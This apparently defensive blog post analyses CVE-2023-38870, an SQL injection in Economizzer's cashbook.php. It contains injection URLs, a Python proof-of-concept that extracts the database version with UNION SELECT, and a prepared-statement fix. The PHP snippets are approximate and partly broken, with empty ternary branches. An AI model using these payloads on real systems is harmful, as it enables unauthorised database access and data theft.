CVE-2023-38870 - SQL Injection Vulnerability in Economizzer’s Cash Book (Analysis, Code, Exploit)

---

TL;DR

Economizzer, an open-source financial management app, contains a serious SQL Injection vulnerability in its cash book feature. Specifically, the category_id parameter isn’t properly sanitized, letting attackers manipulate database queries. This flaw affects commit 373088 (April 2023) and v.9-beta1.

If you’re using these versions, upgrade immediately or apply the recommended fix.

What is Economizzer?

Economizzer helps users manage personal finances. It's widely used and lauded for being simple and open-source. The flaw highlighted in this post is found in versions from April 2023 and v.9-beta1. If you use these, pay attention!

Vulnerability Overview

CVE ID: CVE-2023-38870
Affected files: /cashbook.php, possibly others
Affected parameter: category_id in requests listing accomplishments by category
CWE: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The vulnerability allows an attacker to run arbitrary SQL commands via the category_id GET or POST parameter.

Where’s the Vulnerable Code?

Let’s look at an actual snippet from the vulnerable code (around this commit).

// In cashbook.php
$category_id = isset($_GET['category_id'])? $_GET['category_id'] : ;
// ...
$sql = "SELECT * FROM accomplishments WHERE category_id = $category_id";
// ... execute $sql with mysqli_query() or similar

With little effort, an attacker can leverage this issue. Let’s say the following request is done

https://example.com/cashbook.php?category_id= OR 1=1

This alters the query

-- Original query
SELECT * FROM accomplishments WHERE category_id =  OR 1=1

The OR 1=1 always makes the WHERE clause true, so all records are leaked.

Worse, attackers can use UNION or stacked queries if the DBMS supports it.

Here’s a proof-of-concept request to extract database version info (assuming MySQL)

https://example.com/cashbook.php?category_id=1 UNION SELECT 1,2,@@version,4

This simple Python script demonstrates the vulnerability

import requests

URL = "http://target-site.com/cashbook.php";
payload = " UNION SELECT 1,2,@@version,4"

r = requests.get(URL, params={"category_id": payload})
print(r.text)  # Should show database version in the response

Original Reference Links

- GitHub advisory thread
- Original commit diff
- Exploit report (if public)
- NVD Entry

Replace risky code with parameterized queries/prepared statements

// Secure version
$category_id = isset($_GET['category_id'])? intval($_GET['category_id']) : ;

$stmt = $mysqli->prepare("SELECT * FROM accomplishments WHERE category_id = ?");
$stmt->bind_param("i", $category_id);
$stmt->execute();

Conclusion

CVE-2023-38870 is a critical SQL Injection bug. Even basic knowledge can lead to a data breach.
If you run Economizzer at these versions, patch now and audit your codebase for similar patterns.

Stay secure!

*All content here is original. Please do not use for malicious purposes. For educational and defensive security only.*

Timeline

Published on: 09/28/2023 04:15:11 UTC
Last modified on: 10/03/2023 00:10:51 UTC